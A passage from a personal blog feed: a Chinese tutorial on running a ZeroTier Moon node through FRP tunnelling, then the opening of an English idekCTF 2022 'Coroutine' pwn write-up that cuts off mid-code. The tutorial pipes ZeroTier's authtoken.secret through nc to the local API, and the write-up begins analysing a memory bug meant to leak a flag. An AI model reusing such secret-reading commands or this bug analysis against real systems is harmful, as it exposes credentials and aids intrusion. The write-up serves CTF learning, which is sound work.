命令可以查看本机与其他 peer 的连接是 DIRECT(p2p) 还是 relay（中继），只有这两种连接状态。</p><blockquote><p>该命令需要 sudo/管理员权限。</p></blockquote><p>我们同时还可以看到 Zerotier 会监听这三个端口的 TCP 协议数据。这里的 <strong>TCP 协议数据与打洞/peers沟通无关</strong>，它实际上使用的是 Http 协议，主要用来与本地的 zerotier-cli 进行交互，例如：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">➜  zerotier-one <span class="built_in">echo</span> <span class="string">&quot;GET /info HTTP/1.1\r\nX-ZT1-Auth: <span class="subst">$(sudo cat /var/lib/zerotier-one/authtoken.secret)</span>\r\n\r\n&quot;</span> | nc 127.0.0.1 9993 -v</span><br><span class="line">Connection to 127.0.0.1 9993 port [tcp/*] succeeded!</span><br><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line">Pragma: no-cache</span><br><span class="line">Content-Type: application/json</span><br><span class="line">Content-Length: 91</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">        <span class="string">&quot;controller&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">        <span class="string">&quot;apiVersion&quot;</span>: 4,</span><br><span class="line">        <span class="string">&quot;clock&quot;</span>: 1684295560845,</span><br><span class="line">        <span class="string">&quot;databaseReady&quot;</span>: <span class="literal">true</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>这里我只测试成功过 <code>127.0.0.1:9993</code> 的 TCP 连接，其他监听端口/监听地址的组合我都无法用 nc 测试成功过，暂不了解具体原因。</p></blockquote><p>具体其他的 HTTP 请求选项可以参考 <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3fb00becc578afc0645c60b1de3d84bb4c/service/README.md#network-virtualization-service-api">Network Virtualization Service API</a> 来理解，这里不再赘述。</p><h3 id="3-中继">3. 中继</h3><p>当 host 和 peer 没法 p2p 直连时，Zerotier 会尝试使用中继手段，相关逻辑位于 <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/service/OneService.cpp#L3233">nodeWirePacketSendFunction 函数</a> 中。</p><p>中继也分为两种，一种是 TCP 中继，一种是 UDP 中继：</p><ul><li><p><strong>UDP 中继</strong>。UDP中继是 Zerotier 的主流中继实现方式，它会寻找 Moon/Planet 并要求他们来为待发送的数据包进行 UDP 中继，因此无论是 host 还是 peer，中继发送/接收的数据全部都是 UDP 数据，逻辑比较简单。</p></li><li><p><strong>TCP 中继。</strong> Zerotier 认为 <strong>TCP 中继开销太大</strong>，因此只在极端恶劣的情况下（例如UDP中继完全失败，即所有UDP数据包全被网关过滤或者超时非常严重等情况，）才会使用 TCP 中继，但事实上这种恶劣情况概率极小，所以可以等同于 Zerotier 基本上不使用 TCP 中继。</p><p>Zerotier 只有在 60s 没有接收到任何数据时才能进行 TCP中继，这个时间相当的长，相信大多情况下应该都不会触发这个条件。</p></li></ul><p>用户可以根据 <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/tcp-proxy/README.md">ZeroTier TCP Proxy Server Documentation</a> 配置 <code>local.conf</code> 来指定是否<strong>强制使用 TCP 中继</strong>。在启用强制TCP中继后，UDP中继功能将不再启用。虽然 <strong>Zerotier 认为 TCP 中继会比 UDP 中继慢</strong>，但事实上我用 ping 测试发现 <strong>TCP 中继节点比 UDP 中继节点距离我更近一点</strong>，延迟更小，因此 Zerotier 的这个说法仁者见仁智者见智，需要理论联系实际。</p><h2 id="三、Frpc-内网穿透">三、Frpc 内网穿透</h2><h3 id="1-做法">1. 做法</h3><p><strong>Frpc 用来穿透 Moon 服务器的 9993 UDP 端口。</strong></p><p>这里本人用的是 <a href="https://www.natfrp.com/">NatFrp</a>，这个真的相当良心，免费版每月 5Gb/10Mbps/2tunnel，基本满足绝大多数的需求。</p><p>选一个距离 peers 比较近一点的机房，然后选<strong>多线</strong>机房（个人理解是同时接入多个运营商网络的机房），这样本机在任何运营商网络下都能有比较高的 p2p 打洞成功概率，这是我的隧道配置：</p><p><img src="/2023/05/zerotier_moon_frpc/image-20230517132531412.png" alt="image-20230517132531412"></p><p>注意这里指定本机 IP 时<strong>一定要指定为局域网IP</strong>（即 192.168.0.0/16 等），<strong>而非回环IP（即127.0.0.1</strong>），符合条件的局域网 IP 范围如下图所示：</p><p><img src="/2023/05/zerotier_moon_frpc/image-20230517120903864.png" alt="image-20230517120903864"></p><blockquote><p>代码位置位于 <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3fb00becc578afc0645c60b1de3d84bb4c/node/InetAddress.cpp#L29">InetAddress::ipScope 函数</a>。</p></blockquote><p>可能有人看到 <code>172.16.0.0/12</code> 也可以，因此就在 Zerotier 控制面板上给 moon 服务器/被穿透的服务额外增添了一个 <code>172.16</code> 打头的虚拟网 IP，之后把 Frpc 绑定到这样新添加的 172.16 打头IP上，以为也能达到要求。但经过本人实验是不行的，<strong>原因是 Zerotier 服务不会监听 Zerotier 自己虚拟网段下的 IP</strong>。</p><p>这里填写的本机IP，一定要是既<strong>符合上图网段要求</strong>，同时还<strong>被 Zerotier 监听 UDP 协议</strong>的 IP。</p><h3 id="2-原理">2. 原理</h3><blockquote><p>如果兴趣不大则可以跳过本节内容。</p></blockquote><p>这是因为 <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3fb00becc578afc0645c60b1de3d84bb4c/node/Path.hpp#L223">isAddressValidForPath 函数</a> 只把<strong>四种类型</strong>的 IP 视为有效地址：</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">  * Check whether this address is valid for a ZeroTier path</span></span><br><span class="line"><span class="comment">  *</span></span><br><span class="line"><span class="comment">  * This checks the address type and scope against address types and scopes</span></span><br><span class="line"><span class="comment">  * that we currently support for ZeroTier communication.</span></span><br><span class="line"><span class="comment">  *</span></span><br><span class="line"><span class="comment">  * @param a Address to check</span></span><br><span class="line"><span class="comment">  * @return True if address is good for ZeroTier path use</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">bool</span> <span class="title">isAddressValidForPath</span><span class="params">(<span class="type">const</span> InetAddress &amp;a)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> ((a.ss_family == AF_INET)||(a.ss_family == AF_INET6)) &#123;</span><br><span class="line">        <span class="keyword">switch</span>(a.<span class="built_in">ipScope</span>()) &#123;</span><br><span class="line">                <span class="comment">/* Note: we don&#x27;t do link-local at the moment. Unfortunately these</span></span><br><span class="line"><span class="comment">         * cause several issues. The first is that they usually require a</span></span><br><span class="line"><span class="comment">         * device qualifier, which we don&#x27;t handle yet and can&#x27;t portably</span></span><br><span class="line"><span class="comment">         * push in PUSH_DIRECT_PATHS. The second is that some OSes assign</span></span><br><span class="line"><span class="comment">         * these very ephemerally or otherwise strangely. So we&#x27;ll use</span></span><br><span class="line"><span class="comment">         * private, pseudo-private, shared (e.g. carrier grade NAT), or</span></span><br><span class="line"><span class="comment">         * global IP addresses. */</span></span><br><span class="line">            <span class="keyword">case</span> InetAddress::IP_SCOPE_PRIVATE:</span><br><span class="line">            <span class="keyword">case</span> InetAddress::IP_SCOPE_PSEUDOPRIVATE:</span><br><span class="line">            <span class="keyword">case</span> InetAddress::IP_SCOPE_SHARED:</span><br><span class="line">            <span class="keyword">case</span> InetAddress::IP_SCOPE_GLOBAL:</span><br><span class="line">                <span class="keyword">if</span> (a.ss_family == AF_INET6) &#123;</span><br><span class="line">                    <span class="comment">// TEMPORARY <span class="doctag">HACK:</span> for now, we are going to blacklist he.net IPv6</span></span><br><span class="line">                    <span class="comment">// tunnels due to very spotty performance and low MTU issues over</span></span><br><span class="line">                    <span class="comment">// these IPv6 tunnel links.</span></span><br><span class="line">                    <span class="type">const</span> <span class="type">uint8_t</span> *ipd = <span class="built_in">reinterpret_cast</span>&lt;<span class="type">const</span> <span class="type">uint8_t</span> *&gt;(<span class="built_in">reinterpret_cast</span>&lt;<span class="type">const</span> <span class="keyword">struct</span> sockaddr_in6 *&gt;(&amp;a)-&gt;sin6_addr.s6_addr);</span><br><span class="line">                    <span class="keyword">if</span> ((ipd[<span class="number">0</span>] == <span class="number">0x20</span>)&amp;&amp;(ipd[<span class="number">1</span>] == <span class="number">0x01</span>)&amp;&amp;(ipd[<span class="number">2</span>] == <span class="number">0x04</span>)&amp;&amp;(ipd[<span class="number">3</span>] == <span class="number">0x70</span>)) &#123;</span><br><span class="line">                        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            <span class="keyword">default</span>:</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这其中包括了 <code>IP_SCOPE_PRIVATE</code> 局域网地址和 <code>IP_SCOPE_GLOBAL</code> 公网地址，但并不包括 <code>IP_SCOPE_LOOPBACK</code> 回环地址。</p><p>Zerotier 在接收到 UDP 数据包后会获取包中的<strong>目的 IP</strong>，进而判断该数据包是否合法。这个逻辑比较容易理解，只要知道对方朝的是自己哪个 IP 地址发包，就能得知哪个网卡可以 p2p 打洞。</p><p>但倘若 FRP 绑定的是本机的 127.0.0.1，那么即便其他 peer 能通过 FRP 发包到 <code>udp://127.0.0.1:9993</code>，Zerotier 也会丢弃接收到的 UDP 数据，造成 p2p 失败。</p><h2 id="三、Frpc-测试">三、Frpc 测试</h2><p>在创建好隧道并且也在远程 moon 节点所在机器上也连接好 Frpc 隧道后，接下来<strong>需要测试一下 host 和 moon 之间的 UDP 收发能力</strong>。</p><p><strong>这一步非常重要</strong>，因为 UDP 协议的特殊性，很多网络都会对 UDP 数据包有着严苛的过滤条件。</p><blockquote><p>例如本人在学校校园网中就无法成功收发 UDP 数据包。</p></blockquote><p>测试步骤很简单：</p><ol><li><p><strong>修改 moon 机器上 frpc 待转发的端口</strong>，从 9993 修改为 9992，之后重新启动 frpc，此时穿透的 UDP 数据应该会发送至本机 9992 端口处。</p><p>这一步可以通过直接修改 frpc.ini 或者在网页面板上修改并重新拉取配置文件来完成。</p><p>9992端口没有什么特殊性，可以随便改成一个自己记得住的端口；这里修改端口是因为 9993 端口已经被 Zerotier 服务占用了，一个端口无法同时被多个 UDP 监听。</p></li><li><p><strong>在 moon 机器上启动 UDP-EchoServer 服务</strong>，以下是我用来测试的 python 代码：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># python3 /tmp/udp-echoserver.py 192.168.XX.XX 9992</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">udp_echo_server</span>(<span class="params">host, port</span>):</span><br><span class="line">    server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</span><br><span class="line">    server_socket.bind((host, port))</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;UDP Echo server started on <span class="subst">&#123;host&#125;</span>:<span class="subst">&#123;port&#125;</span>&quot;</span>)</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">       data, addr = server_socket.recvfrom(<span class="number">1024</span>)</span><br><span class="line">       <span class="built_in">print</span>(<span class="string">f&quot;Received data from <span class="subst">&#123;addr&#125;</span>: <span class="subst">&#123;<span class="built_in">len</span>(data)&#125;</span>&quot;</span>)</span><br><span class="line">       server_socket.sendto(<span class="string">b&quot;server: &quot;</span> + data, addr)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) &lt; <span class="number">3</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Usage: python udp_echo_server.py &lt;host&gt; &lt;port&gt;&quot;</span>)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line">    host = sys.argv[<span class="number">1</span>]</span><br><span class="line">    port = <span class="built_in">int</span>(sys.argv[<span class="number">2</span>])</span><br><span class="line">    udp_echo_server(host, port)</span><br></pre></td></tr></table></figure></li><li><p>host 上运行 <code>nc -u &lt;ip&gt; &lt;port&gt;</code> 向 Frpc 中转服务器发送 UDP 数据包，查看发送的数据包能否被转发回来。</p></li></ol><p>测试效果如下，图中上面两个窗口是 moon 服务器的 shell，最下方窗口是 host 的 shell。host 使用 <code>nc -u &lt;ip&gt; &lt;port&gt;</code> 并在交互式界面中输入数据并按下 enter 键发送。该 UDP 数据包将被发送至 Frpc 中转服务器并穿透至 moon 的 <code>udp://192.168.x.x:9992</code>，随后 9992 端口上的 echo server 就会把该数据包原样返回。<strong>只要 host 能在发送 UDP 数据包后原封不动的接收到 UDP 数据，即可证明双方 UDP 收发功能正常。</strong></p><p><img src="/2023/05/zerotier_moon_frpc/image-20230517135624795.png" alt="image-20230517135624795"></p><p>这一步可能会有一定概率失败，失败的原因主要有两个（都是本人遇到过的）：</p><ol><li><p>Frpc <strong>公网中转服务器所分配的端口号过大</strong>，例如分配了 50000+ 的端口号。过大的 UDP 端口号可能会被路由策略过滤，只能重新申请分配新的 UDP 隧道或者更换中转服务器节点，来<strong>降低所分配的 UDP 端口号</strong>。</p><blockquote><p>本人测试 UDP 端口号 &lt; 30000 基本上没有出现过问题。</p></blockquote></li><li><p><strong>复杂或受限网络可能会限制 UDP 数据包的收发</strong>，例如校园网。本人连接校园网后实测无法收发 UDP 数据包，但切换为手机热点就可以通过 UDP 测试。</p></li></ol><blockquote><p>如果想测试 9993 端口的收信功能则可以使用命令：<code>sudo tshark -i any udp port 9993 and src host 192.168.x.x</code></p><p><strong>UDP测试完成后记得把隧道端口号改回 9993</strong>。</p></blockquote><h2 id="四、Zerotier-Moon-搭建">四、Zerotier Moon 搭建</h2><p>关于 Zerotier Moon 搭建网上教程是非常多的，基本上都是大同小异。可以参考这个 <a href="https://dengzile.com/2019/05/%E6%90%AD%E5%BB%BAzerotier%E7%9A%84moon%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%B0%8F%E8%AE%B0/">搭建ZeroTier的Moon服务器小记 - dengzile</a></p><ul><li><p>Moon 服务器：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 0. 切换工作目录</span></span><br><span class="line"><span class="built_in">cd</span> /var/lib/zerotier-one</span><br><span class="line"></span><br><span class="line"><span class="comment"># 1. 创建基础 moon 文件</span></span><br><span class="line"><span class="built_in">sudo</span> zerotier-idtool initmoon identity.public &gt; moon.json</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2. 此处需要修改 moon.json 中 stableEndpoints 为 Frpc 分配的公网IP和端口</span></span><br><span class="line"><span class="comment"># （注意该隧道需要映射至 moon 的 9993 端口）</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 3. 给 moon.json 文件签名，生成 moon 文件</span></span><br><span class="line"><span class="built_in">sudo</span> zerotier-idtool genmoon moon.json</span><br><span class="line"></span><br><span class="line"><span class="comment"># 4. 将签名好的 moon 文件移动至 moons.d 文件夹下</span></span><br><span class="line"><span class="built_in">mkdir</span> moons.d</span><br><span class="line"><span class="built_in">mv</span> 000000*.moon moons.d</span><br><span class="line"></span><br><span class="line"><span class="comment"># 5. 重启 zerotier-one 服务</span></span><br><span class="line"><span class="built_in">sudo</span> service zerotier-one restart</span><br><span class="line"></span><br><span class="line"><span class="comment"># 6. 此时可以罗列出当前的 moons 信息</span></span><br><span class="line"><span class="built_in">sudo</span> zerotier-cli listmoons</span><br></pre></td></tr></table></figure></li><li><p>windows （本机），<strong>使用管理员权限</strong>打开 cmd：</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"># <span class="number">0</span>. 切换工作目录</span><br><span class="line"><span class="function">C:\<span class="title">Users</span>\<span class="title">Kiprey</span>&gt;<span class="title">cd</span> <span class="title">C</span>:\<span class="title">ProgramData</span>\<span class="title">ZeroTier</span>\<span class="title">One</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"># 1. 创建 <span class="title">moons.d</span> 文件夹并切换</span></span><br><span class="line"><span class="function"><span class="title">C</span>:\<span class="title">ProgramData</span>\<span class="title">ZeroTier</span>\<span class="title">One</span>&gt;<span class="title">mkdir</span> <span class="title">moons.d</span></span></span><br><span class="line"><span class="function"><span class="title">C</span>:\<span class="title">ProgramData</span>\<span class="title">ZeroTier</span>\<span class="title">One</span>&gt;<span class="title">cd</span> <span class="title">moons.d</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"># 2. 拷贝远程 <span class="title">moon</span> 节点上的 <span class="title">moon</span> 文件，由于此时 <span class="title">moon</span> 还没配置好，因此这种数据下载实际上是通过 <span class="title">UDP</span> 中继完成。</span></span><br><span class="line"><span class="function"><span class="title">C</span>:\<span class="title">ProgramData</span>\<span class="title">ZeroTier</span>\<span class="title">One</span>\<span class="title">moons.d</span>&gt;<span class="title">scp</span> <span class="title">kiprey</span>@172.24.0.133:/<span class="title">var</span>/<span class="title">lib</span>/<span class="title">zerotier</span>-<span class="title">one</span>/<span class="title">moons.d</span>/000000<span class="title">xxxxxxxxxx.moon</span> .</span></span><br><span class="line"><span class="function">000000<span class="title">xxxxxxxxxx.moon</span>                        100%  259     0.5<span class="title">KB</span>/<span class="title">s</span>   00:00</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"># 3. 重启服务</span></span><br><span class="line"><span class="function"># 键入 <span class="title">win</span> + <span class="title">R</span> 启动 &quot;运行&quot; 窗口 -&gt; <span class="title">services.msc</span> -&gt; 找到 <span class="title">Zerotier</span>-<span class="title">One</span> 服务并重启</span></span><br></pre></td></tr></table></figure></li></ul><blockquote><p>这种下发 moon 文件的操作应该是可以通过 <code>zerotier-cli orbit</code> 命令来实现，但本人在实际测试的是否发现 orbit 可能会失败，即没能成功下发 moon 文件，不太清楚是哪里有问题，因此最终还是手动下载了一下。</p><p>不过这个问题并不重要，只是随口提起。</p></blockquote><p>重启本机 Zerotier 服务后再运行 <code>zerotier-cli peers</code>，可以发现 Moon 节点以及和 Moon 相近的节点全部从 RELAY 中继变成了 DIRECT 直连：</p><ul><li><p>配置 moon 前：</p><p><img src="/2023/05/zerotier_moon_frpc/image-20230517142839955.png" alt="image-20230517142839955"></p><p>sshping 延迟平均高达 300ms，操作 ssh 一卡一卡的。</p></li><li><p>配置 moon 后：</p><p><img src="/2023/05/zerotier_moon_frpc/image-20230517142520240.png" alt="image-20230517142520240"></p><p>sshping 的延迟降低到了 100ms 左右，ssh 操作明显的流畅起来了。</p></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;Zerotier 是一个专用于异地组网的工具，它方便将多台异地机器以 P2P 或者 中转 Relay 的方式实现宛如局域网般的流畅体验。&lt;/p&gt;
&lt;p&gt;Zerotier 组网中节点分为三个部分，分别是位于国外的中央服务器 Planet，用户自建节点 Moon，以及用户其他节点 Leaf。&lt;/p&gt;
&lt;p&gt;由于 Planet 位于国外，当两台机器地理位置相隔甚远时，无论是 UDP 打洞还是 Relay 中继，速度都非常慢，因此尝试自建一台国内Zerotier Moon 来提高打洞概率 + 中继速度。&lt;/p&gt;
&lt;p&gt;网上搭建 Zerotier Moon 的教程都需要购买一台服务器，但本人不想这么折腾，因此尝试探索 FRPC 内网穿透的搭建方式。&lt;/p&gt;</summary>
    
    
    
    <category term="Tools" scheme="https://kiprey.github.io/categories/Tools/"/>
    
    
    <category term="ZeroTier" scheme="https://kiprey.github.io/tags/ZeroTier/"/>
    
  </entry>
  
  <entry>
    <title>idekCTF2022 - Coroutine Writeup</title>
    <link href="https://kiprey.github.io/2023/01/idek_coroutine/"/>
    <id>https://kiprey.github.io/2023/01/idek_coroutine/</id>
    <published>2023-01-20T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.021Z</updated>
    
    <content type="html"><![CDATA[<h2 id="Introduction">Introduction</h2><p>Last weekend I participated in <code>idekCTF 2022</code> with r3kapig. After briefly browsing other pwn challenges, I tried to solve <code>Coroutine</code> and finally solved it (4 sovled in total).</p><p>Now, let’s dive into this challenge!</p><span id="more"></span><h2 id="C-20-Coroutine">C++20 Coroutine</h2><p>What’s the coroutine ?</p><blockquote><p>A coroutine is a function that <strong>can suspend execution</strong> to <strong>be resumed later</strong>. Coroutines are <strong>stackless</strong>: they suspend execution by returning to the caller and the <strong>data that is required to resume execution is stored separately from the stack</strong>. This allows for sequential code that executes asynchronously (e.g. to handle non-blocking I/O without explicit callbacks), and also supports algorithms on lazy-computed infinite sequences and other uses.</p><p>ref: <a href="https://en.cppreference.com/w/cpp/language/coroutines">Coroutines (C++20) - cppreference</a></p></blockquote><p>As we have seen, coroutines are executed in <strong>a single-threaded environment</strong>, and can be <strong>paused as needed during execution</strong> (e.g. waiting response from peers) and finally <strong>find a suitable time to resume execution</strong> (e.g. receive the reply from a peer).</p><p>What does this mean?</p><ol><li>The execution environment may be <strong>different before and after</strong> the <code>co_await</code> statement. (e.g. current thread id)</li><li>If the coroutine holds <strong>a outer pointer or reference</strong>, this may cause memory problem (e.g. UAF、 UAP…)</li></ol><h2 id="Program-Logic">Program Logic</h2><p>User can interact with proxy to <strong>change the proxy receive buffer size and send buffer size</strong>. Interestingly, we can also find that the size of the program’s send buffer is manually set to 128 byte. These indications suggest that the <strong>vulnerability is most likely related to the socket buffer size</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> sendbuff = <span class="number">128</span>;</span><br><span class="line"><span class="built_in">setsockopt</span>(accept_result, SOL_SOCKET, SO_SNDBUF, &amp;sendbuff, <span class="built_in">sizeof</span>(sendbuff));</span><br></pre></td></tr></table></figure><p>After reading the source code carefully, we can know that the program is act as <strong>echo server</strong>, reading the messages from proxy and send back:</p><ol><li><p>create and execute the coroutine. In the coroutine, program will accept client connection and run into <code>client_loop</code> to repeatedly receive and send messages from client.</p></li><li><p>If program cannot receive the message from client (e.g. there is currently no data from the client), or cannot send the message to client (e.g. socket buffer is full), the coroutine will save its own coroutine-handler and suspend its own execution, returning to the caller:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">class</span> <span class="title">RecvAsync</span><span class="params">(SendAsync)</span> : NonCopyable &#123;</span></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    ...</span><br><span class="line">    <span class="function"><span class="keyword">auto</span> <span class="keyword">operator</span> <span class="title">co_await</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Awaiter</span> &#123;</span><br><span class="line">            ...</span><br><span class="line"></span><br><span class="line">            <span class="function"><span class="type">bool</span> <span class="title">await_ready</span><span class="params">()</span> </span>&#123;</span><br><span class="line">                ...</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="function"><span class="type">void</span> <span class="title">await_suspend</span><span class="params">(std::coroutine_handle&lt;&gt; handle)</span> <span class="keyword">noexcept</span> </span>&#123;</span><br><span class="line">                <span class="comment">// save current coroutine handle </span></span><br><span class="line">                ctx_.<span class="built_in">add_read</span>(fd_, std::<span class="built_in">move</span>(handle));</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="function"><span class="type">int</span> <span class="title">await_resume</span><span class="params">()</span> </span>&#123;</span><br><span class="line">                ...</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="keyword">return</span> Awaiter&#123; ctx_, fd_, buffer_ &#125;;</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>The program will run into <code>io_content::run_until_done</code>，monitor the file descriptors with <code>select</code>， and resume the execution of corresponding coroutine if any file descriptors are available.</p><p>Interestingly, in the loop of <code>run_until_done</code>, the program will execute <code>load_flag</code> to load the flag into the stack.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">load_flag</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">char</span> flag[<span class="number">400</span>];</span><br><span class="line">    FILE* fp = <span class="built_in">fopen</span>(<span class="string">&quot;flag&quot;</span>, <span class="string">&quot;rt&quot;</span>);</span><br><span class="line">    <span class="built_in">fscanf</span>(fp, <span class="string">&quot;%s&quot;</span>, flag);</span><br><span class="line">    <span class="built_in">fclose</span>(fp);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">run_until_done</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">while</span> (!reads_.<span class="built_in">empty</span>() || !writes_.<span class="built_in">empty</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">load_flag</span>();</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ol><h2 id="Vulnerability">Vulnerability</h2><p>I was interested in how the coroutine captures the context, so I modified the code and printed out the addresses of all the buffers. Here are some code snippets.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Task&lt;<span class="type">bool</span>&gt; <span class="title">client_loop</span><span class="params">(io_context&amp; ctx, <span class="type">int</span> socket)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">while</span> (<span class="literal">true</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        std::byte buffer[<span class="number">512</span>];</span><br><span class="line">        <span class="built_in">printf</span>(<span 